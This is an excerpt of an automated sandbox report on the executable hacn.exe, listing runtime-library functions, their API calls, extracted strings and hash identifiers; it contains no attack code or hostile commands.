Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction ID: 0c91e0023f8a4a7ee93257e15b799b7baf6aed4700cfb1e66e5c6ff4a037269f
Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction Fuzzy Hash: 5611E935F0894242F6548B7AF9842B99291EF86FA4F448030DB494AB8EEE3DD5C14640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D34638C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61D341ED0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D341F03

_get_daylight.LIBCMT ref: 00007FF61D3464A4
_get_daylight.LIBCMT ref: 00007FF61D3464B5

Strings

?, xrefs: 00007FF61D346435

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
Instruction ID: c190893c0a36d4af7391d6a67def244ae94757e033ca7d43fc1943cec8eba058
Opcode Fuzzy Hash: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
Instruction Fuzzy Hash: 7441F732A08A9282FB648B25E5413BAD660EB92FB4F144235EE5D86BD5FF3ED441C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3396A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3396D6

Part of subcall function 00007FF61D33B00C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B022
Part of subcall function 00007FF61D33B00C: GetLastError.KERNEL32(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B02C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF61D32C0E5), ref: 00007FF61D3396F4

Strings

C:\Users\user\Desktop\hacn.exe, xrefs: 00007FF61D3396E2

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\hacn.exe
API String ID: 2553983749-3561306021
Opcode ID: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
Instruction ID: 6ba792849870dda457a27e8a174c388a9e6d3a8eb46eee94bc6555994102a006
Opcode Fuzzy Hash: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
Instruction Fuzzy Hash: 8C41B536A08F52D6EB54DF21DA410BCA3A4EF86FE4B144035EA0E87B95EF3DE4818310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33D2F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF61D33D40F
GetLastError.KERNEL32 ref: 00007FF61D33D431

Strings

U, xrefs: 00007FF61D33D3BB

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
Instruction ID: 2a11210588323f9d5c8d33dcab901f207106aba2541bd7399a74ac79d1407d44
Opcode Fuzzy Hash: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
Instruction Fuzzy Hash: 6E419372B19A8195DB60DF29F4443A9A760FB99BA4F804031EE4DC7798EF3CD545C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33FA18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF61D33FA58
GetCurrentDirectoryW.KERNEL32 ref: 00007FF61D33FAAA

Strings

:, xrefs: 00007FF61D33FA6E

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: c7252e4211a414b80b8e1d21f501cf8779cf85d1136e96c1270fdab77ddbd927
Instruction ID: b5c166bc29ed5469c6c893124a8d3892a966c0bfd321bf1c946290a3524a9b03
Opcode Fuzzy Hash: c7252e4211a414b80b8e1d21f501cf8779cf85d1136e96c1270fdab77ddbd927
Instruction Fuzzy Hash: 7D21E133A08AC181EB64DB25D05426EB3B1FBC9F98F858035DA8D83684EF7CE944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D322B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A

MessageBoxW.USER32 ref: 00007FF61D322C05
MessageBoxA.USER32 ref: 00007FF61D322C21

Strings

Fatal error detected, xrefs: 00007FF61D322BDB, 00007FF61D322C13

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
Instruction ID: 9ea93b1e940c23ccc927797284722592d12e56604725bf6069100eabb1a6720e
Opcode Fuzzy Hash: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
Instruction Fuzzy Hash: 8C21A972A28E8191E724DB21F4916EAE354FF85BD8F805135E68D87A69EF3CD305CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D322C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A

MessageBoxW.USER32 ref: 00007FF61D322D25
MessageBoxA.USER32 ref: 00007FF61D322D41

Strings

Error detected, xrefs: 00007FF61D322CFB, 00007FF61D322D33

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
Instruction ID: e55e54331727d43b1baf570da55ff03be60f9aad03714ceac1435148462414e1
Opcode Fuzzy Hash: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
Instruction Fuzzy Hash: 2021CC72628E8581E724DB20F4916DAE354FF85BD8F805135E64D87965EF3CD205CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32FF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF61D32FFD0
RaiseException.KERNEL32 ref: 00007FF61D330011

Strings

csm, xrefs: 00007FF61D32FFFE

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
Instruction ID: 6c92b5b0552f82232b7c7c1bfad5803d54b5a6356d461f6c8fe6c4fd46b29960
Opcode Fuzzy Hash: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
Instruction Fuzzy Hash: 63115B33A18F4182EB608F25E44026AB7E0FB89F98F584234EE8C87758EF3CC5518B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D34051C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D34054C
GetDriveTypeW.KERNEL32 ref: 00007FF61D34058C

Strings

:, xrefs: 00007FF61D340575

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
Instruction ID: d49bf65fc7cdd98b4ca7a70061335fcce2dbb19d2882b26c12fd4f09a57c0115
Opcode Fuzzy Hash: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
Instruction Fuzzy Hash: ED01A272E1CA4286FB60EF60946127EE3A0EF86F28F800035D54DC6695FF3DE504CA14

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: hacn.exePID: 7588, Parent PID: 7572COMMON

Non-executed Functions

Function 00007FFE1A458C24 Relevance: 54.6, APIs: 3, Strings: 28, Instructions: 352COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45913D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459175
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4591AF

Strings

double, xrefs: 00007FFE1A458D48
__w64 , xrefs: 00007FFE1A458E3A
volatile, xrefs: 00007FFE1A458FF8
long , xrefs: 00007FFE1A458D31
signed , xrefs: 00007FFE1A45910A
auto, xrefs: 00007FFE1A458F3F
<unknown>, xrefs: 00007FFE1A458F1B
__int128, xrefs: 00007FFE1A458EB7
short, xrefs: 00007FFE1A458CE0
void, xrefs: 00007FFE1A458D86
wchar_t, xrefs: 00007FFE1A4590A8
char16_t, xrefs: 00007FFE1A459065
long, xrefs: 00007FFE1A458CBC
const, xrefs: 00007FFE1A458FDD
float, xrefs: 00007FFE1A458D74
unsigned , xrefs: 00007FFE1A4590FA
__int16, xrefs: 00007FFE1A458E1C
__int8, xrefs: 00007FFE1A458E2E
volatile, xrefs: 00007FFE1A459025
char8_t, xrefs: 00007FFE1A458F2D
__int64, xrefs: 00007FFE1A458EC9
UNKNOWN, xrefs: 00007FFE1A45908D
int, xrefs: 00007FFE1A458CCE
char, xrefs: 00007FFE1A458CF2
char32_t, xrefs: 00007FFE1A4590B7
__int32, xrefs: 00007FFE1A458EDB
bool, xrefs: 00007FFE1A459056
decltype(auto), xrefs: 00007FFE1A4590C6

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1388207849
Opcode ID: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
Instruction ID: 1f676d6e16aa6a2699a040e0f9f6b17905a11fcb78648cf4b936e6efe7ab4705
Opcode Fuzzy Hash: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
Instruction Fuzzy Hash: 3EF19DB2F08E1294F755AB66C8442BC26B0BB01F64F4449F7CA1D97AB9DF3DA664C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45C3C8 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C459
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C492
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C566
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C577
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C5DA
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C5EA
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C636
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C648
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C7BB
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C83B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C84A

Strings

`anonymous namespace', xrefs: 00007FFE1A45C71B

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID: `anonymous namespace'
API String ID: 2943138195-3062148218
Opcode ID: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
Instruction ID: aa17e701eec8a89f978f16ee0dc0f4f9a748a799287ea09d2532b3a749971802
Opcode Fuzzy Hash: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
Instruction Fuzzy Hash: 90E17AB2B08B8295EB10EF66E8801BD77B0FB44B68F4481B6EA4D57B65DF38D564C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45A83C Relevance: 22.9, APIs: 15, Instructions: 358COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A88D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A969
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A9B2
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A9C3

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
Instruction ID: e92beea8d233fa579ddbbb0a83636ca7f0e9fab178687b9a742e8b7c7f0520f8
Opcode Fuzzy Hash: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
Instruction Fuzzy Hash: 54F18AB2F08B829AE701EF66D4901FC37B1EB04B58F4480F2EA4D57AA5DE38D569C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45D20C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 349COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D712

Strings

`generic-class-parameter-, xrefs: 00007FFE1A45D6C7
`generic-method-parameter-, xrefs: 00007FFE1A45D6B7
NULL, xrefs: 00007FFE1A45D2D7
`template-type-parameter-, xrefs: 00007FFE1A45D6D0
nullptr, xrefs: 00007FFE1A45D3FA

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
API String ID: 2943138195-2309034085
Opcode ID: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
Instruction ID: ecb21210ebae98f05e1b43257bdc6b7954e0f60bbfdf2b840741a93ab9fa900a
Opcode Fuzzy Hash: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
Instruction Fuzzy Hash: 8FE19EA2F08E0295FB15FB66C9541BC27A0AF05F64F5401F7CA8D17AB9DE3CA56AC340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A452CE4 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 309COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE1A452D40

Part of subcall function 00007FFE1A455010: _GetEstablisherFrame.LIBVCRUNTIME ref: 00007FFE1A455045
Part of subcall function 00007FFE1A455010: __GetUnwindTryBlock.LIBCMT ref: 00007FFE1A455053
Part of subcall function 00007FFE1A455010: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE1A455078

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A452E18
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452E25
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE1A453060
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45308E
_GetEstablisherFrame.LIBVCRUNTIME ref: 00007FFE1A4530CC

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453154
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A453189

Strings

csm, xrefs: 00007FFE1A452D5A
csm, xrefs: 00007FFE1A452E3D
csm, xrefs: 00007FFE1A452DC1

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3436797354-393685449
Opcode ID: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
Instruction ID: a6d83e2dcd125bfbc972fd24c4e86497a2278a726ab0540f8e308fdf58788eba
Opcode Fuzzy Hash: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
Instruction Fuzzy Hash: F2D15FB2B08B4186EB50AF66D4502BD77A4FB45FA8F0401B6EE4D57769CF38E5A4C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45E350 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 196COMMON

Download Yara Rule

Strings

generic-type-, xrefs: 00007FFE1A45E45E
`template-parameter-, xrefs: 00007FFE1A45E44A
template-parameter-, xrefs: 00007FFE1A45E417
`generic-type-, xrefs: 00007FFE1A45E491

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID:
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 0-3207858774
Opcode ID: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
Instruction ID: 39fa4b15e6ae35a8a47f191e89300ea927501442fc37c2752eba87970adc2b12
Opcode Fuzzy Hash: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
Instruction Fuzzy Hash: 64919EA2B08E8699EB20EB62D4411B877B1AB45FA4F5881F3DA5D033B5DF3CE565C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45A13C Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A198

Part of subcall function 00007FFE1A45722C: DName::operator+=.LIBVCRUNTIME ref: 00007FFE1A457247

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A2C5

Strings

cointerface , xrefs: 00007FFE1A45A26C
enum , xrefs: 00007FFE1A45A287
coclass , xrefs: 00007FFE1A45A27E
class , xrefs: 00007FFE1A45A2DA
union , xrefs: 00007FFE1A45A2F2
`unknown ecsu', xrefs: 00007FFE1A45A164
struct , xrefs: 00007FFE1A45A2E9

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

